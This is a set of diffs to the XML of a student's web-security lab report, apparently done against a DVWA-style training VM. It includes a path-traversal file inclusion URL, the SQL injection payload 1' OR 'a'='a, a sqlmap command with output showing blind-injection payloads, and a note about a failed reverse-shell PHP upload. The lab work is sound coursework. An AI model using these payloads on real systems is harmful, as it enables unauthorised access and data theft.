+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId16"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="3589655"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="180"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Do you think stored XSS is more dangerous than DOM or Reflected XSS</w:t>
+      </w:r>
+      <w:r>
+        <w:t>?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="180"/>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Stored XSS is more dangerous because the exploit can be stored on the web application’s server and database. This will allow the exploit to be executed by other users of the web application.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="180"/>
         <w:rPr>
           <w:b/>
         </w:rPr>
@@ -424,7 +912,7 @@
     </w:p>
     <w:sectPr>
       <w:pgSz w:w="12240" w:h="15840"/>
-      <w:pgMar w:top="1440" w:right="1440" w:bottom="540" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
+      <w:pgMar w:top="1440" w:right="1440" w:bottom="180" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
       <w:cols w:space="720"/>
       <w:docGrid w:linePitch="360"/>
     </w:sectPr>

--- a/Assignment6/Assignment 6 report.docx
+++ b/Assignment6/Assignment 6 report.docx
@@ -14,8 +14,6 @@
         </w:rPr>
         <w:t>Mark Thompson – C00202927 – Assignment 6</w:t>
       </w:r>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -211,7 +209,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>flag{command_injection_is_a_serious_vulnerability}</w:t>
+        <w:t>flag{local_file_inclusion_is_due_improper_sanitization_of_user_input}</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -223,7 +221,7 @@
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>http://192.168.56.102/vulnerabilities/fi/?page=../../hackable/uploads/flag.txt</w:t>
+          <w:t>http://192.168.56.102/vulnerabilities/fi/?page=file4.php</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -234,7 +232,10 @@
         </w:rPr>
       </w:pPr>
       <w:r>
-        <w:t>I used the exploit for task 2 to get list of directories. I used the hidden file attribute for ls command but I didn’t see any hidden files anywhere. So I grabbed the flag in the hackable/uploads directory.</w:t>
+        <w:t xml:space="preserve">I used the exploit for task 2 to get list of directories. I used the hidden file attribute for ls command but I didn’t see any hidden files anywhere. So I </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">tried the ‘hidden’ files from the point of view of not being shown on the website page. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -248,10 +249,10 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53E4315C" wp14:editId="3EC7D842">
-            <wp:extent cx="5943600" cy="3527425"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32FF974C" wp14:editId="5C89EE52">
+            <wp:extent cx="5943600" cy="3566795"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="7" name="Picture 7"/>
+            <wp:docPr id="8" name="Picture 8"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -271,7 +272,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5943600" cy="3527425"/>
+                      <a:ext cx="5943600" cy="3566795"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -283,17 +284,20 @@
           </wp:inline>
         </w:drawing>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Task 4: File upload</w:t>
       </w:r>
     </w:p>
@@ -307,7 +311,6 @@
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Task 5: SQL injection</w:t>
       </w:r>
     </w:p>
@@ -885,10 +888,7 @@
         <w:ind w:left="180"/>
       </w:pPr>
       <w:r>
-        <w:t>Do you think stored XSS is more dangerous than DOM or Reflected XSS</w:t>
-      </w:r>
-      <w:r>
-        <w:t>?</w:t>
+        <w:t>Do you think stored XSS is more dangerous than DOM or Reflected XSS?</w:t>
       </w:r>
     </w:p>
     <w:p>

--- a/Assignment6/Assignment 6 report.docx
+++ b/Assignment6/Assignment 6 report.docx
@@ -284,8 +284,6 @@
           </wp:inline>
         </w:drawing>
       </w:r>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -886,8 +884,14 @@
     <w:p>
       <w:pPr>
         <w:ind w:left="180"/>
-      </w:pPr>
-      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
         <w:t>Do you think stored XSS is more dangerous than DOM or Reflected XSS?</w:t>
       </w:r>
     </w:p>
@@ -899,7 +903,12 @@
         </w:rPr>
       </w:pPr>
       <w:r>
-        <w:t>Stored XSS is more dangerous because the exploit can be stored on the web application’s server and database. This will allow the exploit to be executed by other users of the web application.</w:t>
+        <w:t>Stored XSS is more dangerous because the exploit can be stored on the web application’s server and database. This will allow the exploit to be executed by other users of the</w:t>
+      </w:r>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
+      <w:r>
+        <w:t xml:space="preserve"> web application.</w:t>
       </w:r>
     </w:p>
     <w:p>

--- a/Assignment6/Assignment 6 report.docx
+++ b/Assignment6/Assignment 6 report.docx
@@ -300,109 +300,25 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>Task 5: SQL injection</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="HTMLPreformatted"/>
-        <w:ind w:left="180"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
-          <w:b/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>Payload</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-      <w:r>
-        <w:t>1' OR 'a'='a</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="HTMLPreformatted"/>
-        <w:ind w:left="180"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="180"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t xml:space="preserve">Note about vulnerability – </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">The vulnerability exists because the query is concatenating strings on the where clause to build the query that is executed. No sanitation of input is present. Because of this you can add </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t xml:space="preserve">OR 'a'='a </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">to the input which causes the where clause to always evaluate to true, so the query becomes logically equivalent to the much simpler query: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>select … from users</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="180"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>Screenshot</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="180"/>
-        <w:jc w:val="center"/>
-      </w:pPr>
+      <w:r>
+        <w:t>I was able to inject the php file. See the file in the zip directory.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>I was not able to get the reverse shell to work.  Here is a screenshot of the reverse shell php file uploaded to the website:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:r>
         <w:rPr>
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="770DADC2" wp14:editId="113F51B9">
-            <wp:extent cx="4009292" cy="3006969"/>
-            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
-            <wp:docPr id="1" name="Picture 1"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61723A45" wp14:editId="0605C223">
+            <wp:extent cx="5943600" cy="3877945"/>
+            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
+            <wp:docPr id="7" name="Picture 7"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -422,7 +338,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="4066662" cy="3049996"/>
+                      <a:ext cx="5943600" cy="3877945"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -436,88 +352,103 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:outlineLvl w:val="2"/>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Task 6: Blind SQLI</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="180"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t xml:space="preserve">Why your payload from Task 5 does not work in this page? </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="180"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Task 5 payload doesn’t work because the page’s </w:t>
-      </w:r>
-      <w:r>
-        <w:t>PHP</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> code is checking for the count of rows retrieved by the query. The Task 5 exploit returns more than 1 row, and it branches to the </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-        </w:rPr>
-        <w:t>“User ID exists in the database.”</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> message.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="180"/>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>Command line arguments passed to the sqlmap.py</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>Task 6: Weak Session ID</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="180"/>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>Task 5: SQL injection</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:ind w:left="180"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>Payload</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:t>1' OR 'a'='a</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:ind w:left="180"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="180"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve">Note about vulnerability – </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">The vulnerability exists because the query is concatenating strings on the where clause to build the query that is executed. No sanitation of input is present. Because of this you can add </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve">OR 'a'='a </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">to the input which causes the where clause to always evaluate to true, so the query becomes logically equivalent to the much simpler query: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>select … from users</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="180"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>Screenshot</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="180"/>
+        <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -525,10 +456,10 @@
         </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CF2F692" wp14:editId="0039910D">
-            <wp:extent cx="5943600" cy="3866515"/>
-            <wp:effectExtent l="0" t="0" r="0" b="635"/>
-            <wp:docPr id="2" name="Picture 2"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="770DADC2" wp14:editId="113F51B9">
+            <wp:extent cx="4009292" cy="3006969"/>
+            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
+            <wp:docPr id="1" name="Picture 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -548,7 +479,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5943600" cy="3866515"/>
+                      <a:ext cx="4066662" cy="3049996"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -563,20 +494,242 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:ind w:left="180"/>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:outlineLvl w:val="2"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Task 6: Blind SQLI</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="180"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve">Why your payload from Task 5 does not work in this page? </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="180"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Task 5 payload doesn’t work because the page’s </w:t>
+      </w:r>
+      <w:r>
+        <w:t>PHP</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> code is checking for the count of rows retrieved by the query. The Task 5 exploit returns more than 1 row, and it branches to the </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+        </w:rPr>
+        <w:t>“User ID exists in the database.”</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> message.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="180"/>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>Command line arguments passed to the sqlmap.py</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="180"/>
+      </w:pPr>
+      <w:r>
+        <w:t>http://192.168.56.102/vulnerabilities/sqli_blind/?id=1&amp;Submit=Submit (GET)  # sqlmap.py -u http://192.168.56.102/vulnerabilities/sqli_blind/?id=1&amp;Submit=Submit "--cookie=security=low; PHPSESSID=etp3364hd4chtuf87h0c51t9r2"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="180"/>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>Here are the findings from SqlMap</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:left="180"/>
+      </w:pPr>
+      <w:r>
+        <w:t>sqlmap identified the following injection point(s) with a total of 166 HTTP(s) requests:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:left="180"/>
+      </w:pPr>
+      <w:r>
+        <w:t>---</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:left="180"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Parameter: id (GET)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:left="180"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">    Type: boolean-based blind</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:left="180"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">    Title: AND boolean-based blind - WHERE or HAVING clause</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:left="180"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">    Payload: id=1' AND 8367=8367 AND 'ymFc'='ymFc&amp;Submit=Submit</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:left="180"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:left="180"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">    Type: AND/OR time-based blind</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:left="180"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">    Title: MySQL &gt;= 5.0.12 AND time-based blind</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:left="180"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">    Payload: id=1' AND SLEEP(5) AND 'SrWc'='SrWc&amp;Submit=Submit</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:left="180"/>
+      </w:pPr>
+      <w:r>
+        <w:t>---</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:left="180"/>
+      </w:pPr>
+      <w:r>
+        <w:t>web server operating system: Linux Ubuntu 13.04 or 12.04 or 12.10 (Raring Ringtail or Precise Pangolin or Quantal Quetzal)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:left="180"/>
+      </w:pPr>
+      <w:r>
+        <w:t>web application technology: Apache 2.2.22, PHP 5.3.10</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="180"/>
+      </w:pPr>
+      <w:r>
+        <w:t>back-end DBMS: MySQL &gt;= 5.0.12</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Task 6: Weak Session ID</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="180"/>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D47F0B6" wp14:editId="4BEA5FB1">
-            <wp:extent cx="5943600" cy="3494029"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="3" name="Picture 3"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CF2F692" wp14:editId="0039910D">
+            <wp:extent cx="5943600" cy="3866515"/>
+            <wp:effectExtent l="0" t="0" r="0" b="635"/>
+            <wp:docPr id="2" name="Picture 2"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -596,6 +749,54 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="3866515"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="180"/>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D47F0B6" wp14:editId="4BEA5FB1">
+            <wp:extent cx="5943600" cy="3494029"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="3" name="Picture 3"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId12"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
                       <a:ext cx="5943600" cy="3494029"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
@@ -652,7 +853,7 @@
           <w:noProof/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId12" w:history="1">
+      <w:hyperlink r:id="rId13" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -703,7 +904,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId13"/>
+                    <a:blip r:embed="rId14"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -744,7 +945,7 @@
           <w:b/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId14" w:history="1">
+      <w:hyperlink r:id="rId15" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -766,89 +967,6 @@
             <wp:extent cx="5943600" cy="3625850"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:docPr id="5" name="Picture 5"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="1" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId15"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5943600" cy="3625850"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Task 9: Stored XSS</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="180"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
